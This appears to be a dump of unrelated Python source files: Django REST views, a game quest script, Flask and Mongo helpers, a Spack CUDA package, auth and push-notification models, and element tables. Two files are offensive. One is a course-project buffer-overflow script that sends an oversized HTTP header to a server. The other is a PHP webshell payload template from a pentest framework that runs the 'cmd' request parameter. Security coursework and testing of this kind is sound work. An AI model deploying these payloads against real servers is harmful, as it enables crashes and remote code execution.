) or issubclass(serializer_class, DynamicFieldsSerializer), (
"serializer class must be an instance of \
DynamicFieldsModelSerializer " "instead got %s"
) % (serializer_class.__name__,)
self.serializer_fields = serializer.fields.keys()
self.select_related_fields = [
field.name for field in model._meta.fields
if isinstance(field, (ForeignKey, OneToOneField))
]
self.field_source_mapping = {
field.field_name: field.source
for field in serializer.fields.values()
if isinstance(
field, (ForeignKey, OneToOneField)
)
}
def _get_query_fields(self):
if not self.request:
return ()
request_fields = self.request.query_params.get('fields')
# if requested query fields is set to `all` we will return all
# serializer fields defined in serializer class. Here we assign
# `self.fields = ()` so that it will be assigned all serializer
# fields in `filter_queryset` method.
if request_fields and request_fields == 'all':
self.fields = ()
self.selectable_fields = (self.selectable_fields + tuple(
self.serializer_fields))
elif request_fields:
for request_field in request_fields.split(','):
if request_field not in list(self.fields):
# put selectable fields together with required fields
# defined in the class
self.fields = self.fields + (request_field,)
# just in case if you want to know which of fields
# we get as selectable field
self.selectable_fields = self.selectable_fields+(request_field,) # NOQA: E501
# Some bugs if request fields has 'aggregations'
# So we need to remove it from request fields.
# And assign a tuple fields without aggregations
fields = list(self.fields)
try:
fields.remove('aggregations')
except ValueError:
pass
# Assign it again
self.fields = tuple(fields)
return getattr(self, 'fields', ())
def filter_queryset(self, queryset, *args, **kwargs):
"""
Prefetches based on 'fields' GET arg
"""
filter_fields = copy.deepcopy(self.request.query_params)
        if 'fields' in filter_fields:
filter_fields.pop('fields')
if 'format' in filter_fields:
filter_fields.pop('format')
if 'page' in filter_fields:
filter_fields.pop('page')
if 'page_size' in filter_fields:
filter_fields.pop('page_size')
if 'ordering' in filter_fields:
filter_fields.pop('ordering')
        if 'q' in filter_fields:
filter_fields.pop('q')
if 'q_fields' in filter_fields:
filter_fields.pop('q_fields')
for filter_field in filter_fields:
found = False
try:
declared_filters = self.filter_class.declared_filters
for key in declared_filters:
if filter_field == key:
found = True
if found is False:
# make error in the code to fail
# if input wrong filter name.
setattr(self, 'filter_class', 'No Filter Class')
break
except AttributeError:
pass
fields = self._get_query_fields(*args, **kwargs)
if not fields:
fields = self.serializer_fields
select_related_fields = list(set(
self.select_related_fields
) & set(fields))
if select_related_fields:
queryset = queryset.select_related(*select_related_fields)
for field in fields:
# TODO: Hook this up in the view - 2016-01-15
if hasattr(queryset, 'prefetch_%s' % field):
queryset = getattr(queryset, 'prefetch_%s' % field)()
queryset = super(DynamicView, self).filter_queryset(
queryset, *args, **kwargs
)
return queryset
def get_serializer(self, *args, **kwargs):
"""
Apply 'fields' to dynamic fields serializer
"""
fields = self._get_query_fields()
kwargs['context'] = self.get_serializer_context()
return super(DynamicView, self).get_serializer(
fields=fields, *args, **kwargs
)
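# Request-level sketch (endpoint and field names are illustrative): a list view built on
# DynamicView reads the 'fields' query parameter, so
#     GET /api/activities/?fields=id,title   -> only those two fields are serialized
#     GET /api/activities/?fields=all        -> every field the serializer declares
# and the select_related()/prefetch_* calls in filter_queryset() are limited to the
# fields actually requested.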
class DynamicListView(DynamicView, ListAPIView):
"""
List view with dynamic properties
"""
class DynamicDetailView(DynamicView, RetrieveAPIView):
"""
List view with dynamic properties
"""
class DynamicListCRUDView(DynamicView, ListCreateAPIView):
"""
List view with dynamic properties
"""
class DynamicDetailCRUDView(DynamicView, RetrieveUpdateDestroyAPIView):
"""
List view with dynamic properties
"""
class SaveAllSerializer(mixins.RetrieveModelMixin,
mixins.UpdateModelMixin,
mixins.DestroyModelMixin,
mixins.CreateModelMixin,
GenericAPIView):
def get(self, request, *args, **kwargs):
return self.retrieve(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
return self.create(request, *args, **kwargs)
def put(self, request, *args, **kwargs):
return self.update(request, *args, **kwargs)
def patch(self, request, *args, **kwargs):
return self.partial_update(request, *args, **kwargs)
def delete(self, request, *args, **kwargs):
return self.destroy(request, *args, **kwargs)
nmahlangu/cs263-project-one | exploit-2c.py | Python | mit | 1,279 | 0.016419
#!/usr/bin/python
import sys
import socket
import traceback
import urllib
import struct
def build_exploit(shellcode):
req = "GET / HTTP/1.0\r\n" + \
"Evil: {evil}\r\n" + \
"Host: birk105.studby.uio.no:81\r\n\r\n"
# 536 is first address that causes the server to not return a valid response
req = req.replace("{evil}","".join(['a' for i in xrange(5000)]))
return req
def send_req(host, port, req):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to %s:%d..." % (host, port))
sock.connect((host, port))
print("Connected, sending request...")
sock.send(req)
print("Request sent, waiting for reply...")
rbuf = sock.recv(1024)
resp = ""
while len(rbuf):
resp = resp + rbuf
rbuf = sock.recv(1024)
print("Received reply.")
sock.close()
return resp
# execute request
if len(sys.argv) != 3:
print("Usage: " + sys.argv[0] + " host port")
exit()
try:
shellfile = open("shellcode.bin", "r")
shellcode = shellfile.read()
req = build_exploit(shellcode)
print("HTTP request:")
print(req)
resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)
except:
print("Exception:")
print(traceback.format_exc())
zenn1989/scoria-interlude | L2Jscoria-Game/data/scripts/quests/269_InventionAmbition/__init__.py | Python | gpl-3.0 | 2,003 | 0.044433
# Rewritten by RayzoR
import sys
from com.l2scoria.gameserver.model.quest import State
from com.l2scoria.gameserver.model.quest import QuestState
from com.l2scoria.gameserver.model.quest.jython import QuestJython as JQuest
qn = "269_InventionAmbition"
class Quest (JQuest) :
def __init__(self,id,name,descr):
JQuest.__init__(self,id,name,descr)
self.questItemIds = [10866]
def onEvent (self,event,st) :
htmltext = event
if event == "32486-03.htm" :
st.set("cond","1")
st.setState(STARTED)
st.playSound("ItemSound.quest_accept")
  elif event == "32486-05.htm" :
st.exitQuest(1)
st.playSound("ItemSound.quest_finish")
  return htmltext
def onTalk (self,npc,player):
htmltext = "<html><body>You are either not on a quest that involves this NPC, or you don't meet this NPC's minimum quest requirements.</body></html>"
st = player.getQuestState(qn)
if not st : return htmltext
npcId = npc.getNpcId()
id = st.getState()
EnergyOres = st.getQuestItemsCount(10866)
if id == CREATED :
if player.getLevel() < 18 :
htmltext = "32486-00.htm"
st.exitQuest(1)
else :
htmltext = "32486-01.htm"
elif EnergyOres > 0:
htmltext = "32486-07.htm"
bonus = 0
if EnergyOres >= 20:
bonus = 2044
st.giveItems(57,EnergyOres*50+bonus)
st.takeItems(10866,-1)
else :
htmltext = "32486-04.htm"
return htmltext
def onKill(self,npc,player,isPet):
st = player.getQuestState(qn)
if not st : return
if st.getState() != STARTED : return
if st.getRandom(10)<6 :
st.giveItems(10866,1)
st.playSound("ItemSound.quest_itemget")
return
QUEST = Quest(269,qn,"Invention Ambition")
CREATED = State('Start', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
QUEST.addStartNpc(32486)
QUEST.addTalkId(32486)
for mob in range(21124,21132) :
QUEST.addKillId(mob)
jiangzhw/Beebeeto-framework | utils/payload/webshell/php.py | Python | gpl-2.0 | 400 | 0.005
#author: fyth
from webshell import *
class PhpShell(Webshell):
_password = 'cmd'
_content = "<?php var_dump(md5(123));@assert($_REQUEST['{0}']);?>"
_check_statement = 'var_dump(md5(123));'
_keyword = '202cb962ac59075b964b07152d234b70'
class PhpVerify(VerifyShell):
    _content = "<?php var_dump(md5(123));unlink(__FILE__);?>"
_keyword = '202cb962ac59075b964b07152d234b70'
revarbat/epubber | epubber/views/main.py | Python | bsd-2-clause | 2,968 | 0.003706
from __future__ import absolute_import
import re, os, sys
from clay import app
import clay.config
from flask import make_response, request, redirect, render_template, url_for
from epubber.fimfic_epubgen import FimFictionEPubGenerator
site_epub_classes = [
FimFictionEPubGenerator
]
accesslog = clay.config.get_logger('epubber_access')
#####################################################################
# Main App Views Section
#####################################################################
@app.route('/', methods=['GET', 'POST'])
def main_view():
story = request.args.get("story") or None
if story:
data = None
for epgenclass in site_epub_classes:
epgen = epgenclass()
if epgen.handle_url(story):
epub_file, data = epgen.gen_epub()
accesslog.info('%(title)s - %(url)s' % epgen.metas)
del epgen
response = make_response(data)
response.headers["Content-Type"] = "application/epub+zip"
response.headers["Content-Disposition"] = "attachment; filename=%s" % epub_file
return response
del epgen
return ("Cannot generate epub for this URL.", 400)
return render_template("main.html")
#####################################################################
# Secondary Views Section
#####################################################################
@app.route('/health', methods=['GET'])
def health_view():
'''
Heartbeat view, because why not?
'''
return ('OK', 200)
#####################################################################
# URL Shortener Views Section
#####################################################################
@app.route('/img/<path>', methods=['GET', 'POST'])
def static_img_proxy_view(path):
'''
Make shorter URLs for image files.
'''
path = re.sub(r'[^A-Za-z0-9_.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('img', path)))
@app.route('/js/<path>', methods=['GET', 'POST'])
def static_js_proxy_view(path):
'''
Make shorter URLs for javascript files.
'''
path = re.sub(r'[^A-Za-z0-9_+.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('js', path)))
@app.route('/css/<path>', methods=['GET', 'POST'])
def static_css_proxy_view(path):
'''
    Make shorter URLs for CSS files.
'''
    path = re.sub(r'[^A-Za-z0-9_+.-]', r'_', path)
return redirect(url_for('static', filename=os.path.join('css', path)))
#####################################################################
# Main
#####################################################################
def main():
# Make templates copacetic with UTF8
reload(sys)
sys.setdefaultencoding('utf-8')
# App Config
app.secret_key = clay.config.get('flask.secret_key')
main()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4 nowrap
PrayAndGrow/server | patrons/apps.py | Python | lgpl-3.0 | 89 | 0
from django.apps import AppConfig
class PatronsConfig(AppConfig):
name = 'patrons'
dotskapes/dotSkapes | models/003_data_manager.py | Python | mit | 10,267 | 0.019382
import pymongo
from pymongo.objectid import ObjectId
import pymongo.cursor
class MongoWrapper:
def __init__ (self, cursor, model = None):
if model:
if not cursor['public']:
if not auth.user.id == cursor['owner']:
raise HTTP (401)
self.__dict__['cursor'] = cursor
self.__dict__['model'] = model
def __getattr__ (self, key):
try:
return getattr (self.cursor, key)
except AttributeError:
try:
val = self.cursor[unicode (key)]
if (type (val) == list) or (type (val) == dict):
return MongoWrapper (self.cursor[unicode (key)], self.model)
else:
return val
except KeyError:
return None
def __nonzero__ (self):
if self.cursor is None:
return False
return len (self.cursor) != 0
def __iter__ (self):
return MongoWrapperIter (self.cursor, self.model)
def public (self):
result = {}
result['id'] = str (self.cursor['_id'])
result['tags'] = self.cursor['tags']
for key in self.model.public ():
if self.cursor.has_key (key.name):
result[key.name] = self.cursor[key.name]
else:
result[key.name] = None
return result
def json (self):
return json.dumps (self.public ())
class MongoCursorWrapper:
def __init__ (self, cursor, model = None):
self.__cursor = cursor
self.model = model
def first (self):
if self.__cursor.count () > 0:
return self[0]
else:
return None
def __getattr__ (self, key):
return getattr (self.__cursor, key)
def __getitem__ (self, index):
record = self.__cursor[index]
if self.model:
if not record['public']:
if not auth.user.id == record['owner']:
raise HTTP (401)
return MongoWrapper (record, self.model)
def json (self):
result = []
for item in self:
result.append (item.public ())
return json.dumps (result)
def __len__ (self):
return self.__cursor.count ()
def __iter__ (self):
return MongoWrapperIter (self.__cursor, self.model)
class MongoWrapperIter:
def __init__ (self, cursor, model):
self.__cursor = iter (cursor)
self.model = model
def __iter__ (self):
return self
def next (self):
val = self.__cursor.next ()
if (type (val) == list) or (type (val) == dict):
return MongoWrapper (val, self.model)
else:
return val
class MongoCollectionWrapper:
def __init__ (self, name, model):
self.name = name
self.model = model
def authorized (self, record):
if not record['public']:
if not auth.user.id == record['owner']:
raise RuntimeError ()
def __getattr__ (self, key):
def action (*args, **kw):
data = getattr (mongo[self.name], key) (*args, **kw)
if type (data) == pymongo.cursor.Cursor:
return MongoCursorWrapper (data, self.model)
elif type (data) == dict:
return MongoWrapper (data, self.model)
else:
return data
return action
class DataManager:
def __init__ (self):
self.collections = {}
self.models = {}
def user (self):
user = mongo.users.find_one ({'user_id': auth.user.id})
if not user:
user = {'user_id': auth.user.id}
mongo.users.insert (user)
#print 'creating user'
return user
def define_datatype (self, datatype, model):
self.models[datatype] = model
self.collections[datatype] = MongoCollectionWrapper (datatype, model)
def insert (self, datatype, **kw):
kw['owner'] = auth.user.id
if not kw.has_key ('tags'):
kw['tags'] = []
if not kw.has_key ('public'):
kw['public'] = False
return self.collections[datatype].insert (kw)
def count (self, datatype):
return self.collections[datatype].count ()
def update (self, datatype, entry_id, **kw):
self.collections[datatype].update ({'_id': ObjectId (entry_id)}, {'$set': kw})
def global_load (self, datatype, kw = None):
if not kw:
data = self.collections[datatype].find ({
'public': True
})
else:
query = []
for kw_regex in kw:
query.append ({'name': {'$regex': kw_regex, '$options': 'i'}})
query.append ({'tags': {'$regex': kw_regex, '$options': 'i'}})
data = self.collections[datatype].find ({
'public': True,
'$or': query
})
return data
def local_load (self, datatype, keywords = None):
user = dm.user ()
if not user.has_key (datatype):
            user[datatype] = []
mongo.users.update ({'_id': user['_id']}, {'$set': {datatype: []}})
ids = user[datatype]
#data = mongo[datatype].find ({'_id': {'$in': ids}})
data = self.collections[datatype].find ({'_id': {'$in': map (lambda x: ObjectId (x), ids)}})
return data
def load_keyworded (self, datatype, kw):
return self.collections[datatype].find ({'tags': {'$in': kw}})
def get (self, datatype, object_id):
return self.collections[datatype].find_one ({'_id': ObjectId (object_id)})
def query (self, datatype, **query):
return self.collections[datatype].find (query)
def owner (self, datatype, object_id):
data = self.collections[datatype].find_one ({'_id': ObjectId (object_id)})
def public (self, datatype, object_id, pub_status):
self.collections[datatype].update ({'_id': ObjectId (object_id)}, {'$set': {'public': pub_status}})
def link (self, datatype, object_id):
dm.user ()
mongo.users.update ({'user_id': auth.user.id}, {'$push': {datatype: ObjectId (object_id)}})
#print dm.user ()
def unlink (self, datatype, object_id):
mongo.users.update ({'user_id': auth.user.id}, {'$pull': {datatype: ObjectId (object_id)}})
def delete (self, datatype, **kw):
self.collections[datatype].remove (kw)
def dup (self, datatype, alt_datatype):
self.models[alt_datatype] = self.models[datatype]
self.collections[alt_datatype] = self.collections[datatype]
def get_types (self):
return self.models
def tag (self, datatype, object_id, kw):
self.collections[datatype].update ({'_id': ObjectId (object_id)}, {'$pushAll': {'tags': kw}})
#def __ensure_user (self, user_id):
# if not mongo.users.find_one ({'user_id': user_id}):
# mongo.users.insert ({'user_id': user_id})
#def __ensure_type (self, user_id, datatype):
# if not mongo.users.find_one ({'user_id': user_id,
# datatype: {'$exists': true}
# }):
# mongo.users.update ({'user_id': user_id}, {datatype: []})
def boolean (val):
if isinstance (val, str):
lower = val.lower ()
if lower == 'false':
return False
elif lower == 'f':
return False
elif lower == 'true':
return True
elif lower == 't':
return True
elif isinstance (val, int):
if val == 0:
return False
elif val == 1:
return True
elif isinstance (val, float):
if val == 0.0:
return False
elif val == 1.0:
return True
else:
if val is None:
return False
raise RuntimeError ('Cast to boolean failed: Could not convert ' +
str (val) + ' to a boolean')
def cond_assign (dst, src, key):
if src.has_key (key):
dst[key] = src[key]
class attr_dict (d
tmerrick1/spack | var/spack/repos/builtin/packages/cuda/package.py | Python | lgpl-2.1 | 3,901 | 0.001794
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
from glob import glob
class Cuda(Package):
"""CUDA is a parallel computing platform and programming model invented
by NVIDIA. It enables dramatic increases in computing performance by
harnessing the power of the graphics processing unit (GPU).
Note: This package does not currently install the drivers necessary
to run CUDA. These will need to be installed manually. See:
https://docs.nvidia.com/cuda/ for details."""
homepage = "https://developer.nvidia.com/cuda-zone"
    version('9.2.88', 'dd6e33e10d32a29914b7700c7b3d1ca0', expand=False,
            url="https://developer.nvidia.com/compute/cuda/9.2/Prod/local_installers/cuda_9.2.88_396.26_linux")
version('9.1.85', '67a5c3933109507df6b68f80650b4b4a', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.1/Prod/local_installers/cuda_9.1.85_387.26_linux")
version('9.0.176', '7a00187b2ce5c5e350e68882f42dd507', expand=False,
url="https://developer.nvidia.com/compute/cuda/9.0/Prod/local_installers/cuda_9.0.176_384.81_linux-run")
version('8.0.61', '33e1bd980e91af4e55f3ef835c103f9b', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/Prod2/local_installers/cuda_8.0.61_375.26_linux-run")
version('8.0.44', '6dca912f9b7e2b7569b0074a41713640', expand=False,
url="https://developer.nvidia.com/compute/cuda/8.0/prod/local_installers/cuda_8.0.44_linux-run")
version('7.5.18', '4b3bcecf0dfc35928a0898793cf3e4c6', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/7.5/Prod/local_installers/cuda_7.5.18_linux.run")
version('6.5.14', '90b1b8f77313600cc294d9271741f4da', expand=False,
url="http://developer.download.nvidia.com/compute/cuda/6_5/rel/installers/cuda_6.5.14_linux_64.run")
def install(self, spec, prefix):
runfile = glob(join_path(self.stage.path, 'cuda*_linux*'))[0]
chmod = which('chmod')
chmod('+x', runfile)
runfile = which(runfile)
# Note: NVIDIA does not officially support many newer versions of
# compilers. For example, on CentOS 6, you must use GCC 4.4.7 or
# older. See:
# http://docs.nvidia.com/cuda/cuda-installation-guide-linux/#system-requirements
# https://gist.github.com/ax3l/9489132
# for details.
runfile(
'--silent', # disable interactive prompts
'--verbose', # create verbose log file
'--override', # override compiler version checks
'--toolkit', # install CUDA Toolkit
'--toolkitpath=%s' % prefix
)
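    # Usage sketch (spack CLI, spec is illustrative): once this package file is in a
    # repo, a particular toolkit version is installed with, e.g.,
    #     spack install cuda@9.2.88
    # after which `spack load cuda` makes nvcc available in the environment.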
thomec/tango | accounts/authentication.py | Python | gpl-2.0 | 1,296 | 0.003086
# accounts/authentication.py
import requests
import logging
from django.conf import settings
from django.contrib.auth import get_user_model
logger = logging.getLogger(__name__)
User = get_user_model()
PERSONA_VERIFY_URL = 'https://verifier.login.persona.org/verify'
#DOMAIN = 'localhost'
#DOMAIN = 'http://hotzenplotz.pythonanywhere.com'
class PersonaAuthenticationBackend(object):
def authenticate(self, assertion):
logging.warning('entering authenticate function')
response = requests.post(
PERSONA_VERIFY_URL,
data = {'assertion': assertion, 'audience': settings.DOMAIN}
)
logging.warning('got response from persona')
logging.warning(response.content.decode())
if response.ok and response.json()['status'] == 'okay':
            email = response.json()['email']
try:
return User.objects.get(email=email)
except User.DoesNotExist:
return User.objects.create(email=email)
else:
logger.warning(
'Persona says no. Json was: {}'.format(response.json())
)
def get_user(self, email):
try:
return User.objects.get(email=email)
except User.DoesNotExist:
return None
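# Wiring sketch (values are illustrative): this backend is used by adding it to
# AUTHENTICATION_BACKENDS and defining the DOMAIN that Persona should verify against,
# e.g. in settings.py:
#     AUTHENTICATION_BACKENDS = ['accounts.authentication.PersonaAuthenticationBackend']
#     DOMAIN = 'localhost'
# after which django.contrib.auth.authenticate(assertion=...) routes through
# authenticate() above.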
jmmauricio/pypstools | dev/colormaps.py | Python | gpl-3.0 | 214 | 0.037383
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(4)
y = x
t = [1.0,0.9,0.95,1.05]
s = np.array([1.0,0.9,0.95,1.05])*100
plt.scatter(x, y, c=t, s=s, alpha = 0.5)
plt.colorbar()
plt.show()
amyth/django-instapush | instapush/models/base.py | Python | mit | 2,928 | 0.006489
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.utils.translation import ugettext_lazy as _
from .fields import HexIntegerField
from .managers import APNSDeviceManager, GCMDeviceManager
try:
instapush_settings = settings.INSTAPUSH_SETTINGS
except AttributeError:
raise ImproperlyConfigured("Please include instapush settings dictionary "\
"in your django settings")
class BaseDevice(models.Model):
"""
Represents a base device object. This class defines
the generic fields to be used by all device types.
All other device types should inherit from this.
"""
name = models.CharField(_('name'), max_length=255, blank=True, null=True)
active = models.BooleanField(_('active'), default=True)
## as a device can not only be related to a user
## but any other defined models. we let the push
## user decide which model should be the owner
## of a device object. For cases, where a device
## does not have to be related to any model this
## can be left empty and hence blank and null are
## set to True
owner = models.ForeignKey(instapush_settings.get('DEVICE_OWNER_MODEL'),
blank=True, null=True)
created = models.DateTimeField(_('created'), auto_now_add=True)
updated = models.DateTimeField(_('updated'), auto_now=True)
class Meta:
abstract = True
def __unicode__(self):
return self.name or self.device_id or self.registration_id
class GCMDevice(BaseDevice):
"""
Represents an android device
"""
device_id = HexIntegerField(_('Device ID'), blank=True, null=True,
db_index=True)
registration_id = models.TextField(_('Registration ID'))
## Set custom manager
objects = GCMDeviceManager()
class Meta:
verbose_name = _('GCM Device')
verbose_name_plural = _('GCM Devices')
    def send_message(self, message, **kwargs):
"""
        Sends a push notification to this device via GCM
"""
from ..libs.gcm import gcm_send_message
data = kwargs.pop("extra", {})
if message is not None:
data["message"] = message
return gcm_send_message(registration_id=self.registration_id,
data=data, **kwargs)
class APNSDevice(BaseDevice):
"""
Represents an iOS device
"""
    device_id = models.UUIDField(_('Device ID'), blank=True, null=True,
db_index=True)
registration_id = models.CharField(_('Registration ID'), max_length=64,
unique=True)
## Set custom manager
    objects = APNSDeviceManager()
class Meta:
verbose_name = _('APNS Device')
verbose_name_plural = _('APNS Devices')
def send_message(self, message, **kwargs):
from ..libs.apns import apns_send_message
return apns_send_message(registration_id=self.registration_id,
alert=message, **kwargs)
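# Usage sketch (token and payload are illustrative): once a device row exists, sending a
# push is just a model method call.
#
#     device = GCMDevice.objects.create(registration_id='token-from-the-app')
#     device.send_message('Hello from instapush', extra={'badge': 1})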
kratman/psi4public | psi4/driver/qcdb/periodictable.py | Python | gpl-2.0 | 78,237 | 0.013434
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""Elemental masses (most common isotope), symbols, and atomic numbers from psi4.
"""
_temp_element = ["GHOST", "HYDROGEN", "HELIUM", "LITHIUM", "BERYLLIUM",
"BORON", "CARBON", "NITROGEN", "OXYGEN", "FLUORINE",
"NEON", "SODIUM", "MAGNESIUM", "ALUMINUM", "SILICON",
"PHOSPHORUS", "SULFUR", "CHLORINE", "ARGON", "POTASSIUM",
"CALCIUM", "SCANDIUM", "TITANIUM", "VANADIUM", "CHROMIUM",
"MANGANESE", "IRON", "COBALT", "NICKEL", "COPPER",
"ZINC", "GALLIUM", "GERMANIUM", "ARSENIC", "SELENIUM",
"BROMINE", "KRYPTON", "RUBIDIUM", "STRONTIUM", "YTTRIUM",
"ZIRCONIUM", "NIOBIUM", "MOLYBDENUM", "TECHNETIUM", "RUTHENIUM",
"RHODIUM", "PALLADIUM", "SILVER", "CADMIUM", "INDIUM",
"TIN", "ANTIMONY", "TELLURIUM", "IODINE", "XENON",
"CESIUM", "BARIUM", "LANTHANUM", "CERIUM", "PRASEODYMIUM",
"NEODYMIUM", "PROMETHIUM", "SAMARIUM", "EUROPIUM", "GADOLINIUM",
"TERBIUM", "DYSPROSIUM", "HOLMIUM", "ERBIUM", "THULIUM",
"YTTERBIUM", "LUTETIUM", "HAFNIUM", "TANTALUM", "TUNGSTEN",
"RHENIUM", "OSMIUM", "IRIDIUM", "PLATINUM", "GOLD",
"MERCURY", "THALLIUM", "LEAD", "BISMUTH", "POLONIUM",
"ASTATINE", "RADON", "FRANCIUM", "RADIUM", "ACTINIUM",
"THORIUM", "PROTACTINIUM", "URANIUM", "NEPTUNIUM", "PLUTONIUM",
"AMERICIUM", "CURIUM", "BERKELIUM", "CALIFORNIUM", "EINSTEINIUM",
"FERMIUM", "MENDELEVIUM", "NOBELIUM", "LAWRENCIUM" "RUTHERFORDIUM",
"DUBNIUM", "SEABORGIUM", "BOHRIUM"]
_temp_symbol = ["X", "H", "HE", "LI", "BE", "B", "C", "N", "O", "F", "NE", "NA", "MG",
"AL", "SI", "P", "S", "CL", "AR", "K", "CA", "SC", "TI", "V", "CR", "MN", "FE", "CO",
"NI", "CU", "ZN", "GA", "GE", "AS", "SE", "BR", "KR", "RB", "SR", "Y", "ZR", "NB",
"MO", "TC", "RU", "RH", "PD", "AG", "CD", "IN", "SN", "SB", "TE", "I", "XE", "CS",
"BA", "LA", "CE", "PR", "ND", "PM", "SM", "EU", "GD", "TB", "DY", "HO", "ER", "TM",
"YB", "LU", "HF", "TA", "W", "RE", "OS", "IR", "PT", "AU", "HG", "TL", "PB", "BI",
"PO", "AT", "RN", "FR", "RA", "AC", "TH", "PA", "U", "NP", "PU", "AM", "CM", "BK",
"CF", "ES", "FM", "MD", "NO", "LR", "RF", "DB", "SG", "BH", "HS", "MT", "DS", "RG",
"UUB", "UUT", "UUQ", "UUP", "UUH", "UUS", "UUO"]
_temp_z = list(range(0, 108))
_temp_mass = [
0., 1.00782503207, 4.00260325415, 7.016004548, 9.012182201, 11.009305406,
12, 14.00307400478, 15.99491461956, 18.998403224, 19.99244017542,
22.98976928087, 23.985041699, 26.981538627, 27.97692653246, 30.973761629,
31.972070999, 34.968852682, 39.96238312251, 38.963706679, 39.962590983,
44.955911909, 47.947946281, 50.943959507, 51.940507472, 54.938045141,
55.934937475, 58.933195048, 57.935342907, 62.929597474, 63.929142222,
68.925573587, 73.921177767, 74.921596478, 79.916521271, 78.918337087,
85.910610729, 84.911789737, 87.905612124, 88.905848295, 89.904704416,
92.906378058, 97.905408169, 98.906254747, 101.904349312, 102.905504292,
105.903485715, 106.90509682, 113.90335854, 114.903878484, 119.902194676,
120.903815686, 129.906224399, 126.904472681, 131.904153457, 132.905451932,
137.905247237, 138.906353267, 139.905438706, 140.907652769, 141.907723297,
144.912749023, 151.919732425, 152.921230339, 157.924103912, 158.925346757,
163.929174751, 164.93032207, 165.930293061, 168.93421325, 173.938862089,
174.940771819, 179.946549953, 180.947995763, 183.950931188, 186.955753109,
191.96148069, 192.96292643, 194.964791134, 196.966568662, 201.970643011,
204.974427541, 207.976652071, 208.980398734, 208.982430435, 210.987496271,
222.017577738, 222.01755173, 228.031070292, 227.027752127, 232.038055325,
231.03588399, 238.050788247, 237.048173444, 242.058742611, 243.06138108,
247.07035354, 247.07030708, 251.079586788, 252.082978512, 257.095104724,
258.098431319, 255.093241131, 260.105504, 263.112547, 255.107398, 259.114500,
262.122892, 263.128558, 265.136151, 281.162061, 272.153615, 283.171792, 283.176451,
    285.183698, 287.191186, 292.199786, 291.206564, 293.214670]
_temp_iso_symbol = [
"H", "H1", "H2", "D", "H3", "T", "H4", "H5", "H6", "H7", "HE", "HE3", "HE4",
"HE5", "HE6", "HE7", "HE8", "HE9", "HE10", "LI", "LI3", "LI4", "LI5", "LI6",
"LI7", "LI8", "LI9", "LI10", "LI11", "LI12", "BE", "BE5", "BE6", "BE7", "BE8",
"BE9", "BE10", "BE11", "BE12", "BE13", "BE14", "BE15", "BE16", "B", "B6", "B7",
"B8", "B9", "B10", "B11", "B12", "B13", "B14", "B15", "B16", "B17", "B18", "B19",
"C", "C8", "C9", "C10", "C11", "C12", "C13", "C14", "C15", "C16", "C17", "C18",
"C19", "C20", "C21", "C22", "N", "N10", "N11", "N12", "N13", "N14", "N15", "N16",
"N17", "N18", "N19", "N20", "N21", "N22", "N23", "N24", "N25", "O", "O12", "O13",
"O14", "O15", "O16", "O17", "O18", "O19", "O20", "O21", "O22", "O23", "O24",
"O25", "O26", "O27", "O28", "F", "F14", "F15", "F16", "F17", "F18", "F19", "F20",
"F21", "F22", "F23", "F24", "F25", "F26", "F27", "F28", "F29", "F30", "F31",
"NE", "NE16", "NE17", "NE18", "NE19", "NE20", "NE21", "NE22", "NE23", "NE24",
"NE25", "NE26", "NE27", "NE28", "NE29", "NE30", "NE31", "NE32", "NE33", "NE34",
"NA", "NA18", "NA19", "NA20", "NA21", "NA22", "NA23", "NA24", "NA25", "NA26",
"NA27", "NA28", "NA29", "NA30", "NA31", "NA32", "NA33", "NA34", "NA35", "NA36",
"NA37", "MG", "MG19", "MG20", "MG21", "MG22", "MG23", "MG24", "MG25", "MG26",
"MG27", "MG28", "MG29", "MG30", "MG31", "MG32", "MG33", "MG34", "MG35", "MG36",
"MG37", "MG38", "MG39", "MG40", "AL", "AL21", "AL22", "AL23", "AL24", "AL25",
"AL26", "AL27", "AL28", "AL29", "AL30", "AL31", "AL32", "AL33", "AL34", "AL35",
"AL36", "AL37", "AL38", "AL39", "AL40", "AL41", "AL42", "SI", "SI22", "SI23",
"SI24", "SI25", "SI26", "SI27", "SI28", "SI29", "SI30", "SI31", "SI32", "SI33",
"SI34", "SI35", "SI36", "SI37", "SI38", "SI39", "SI40", "SI41", "SI42", "SI43",
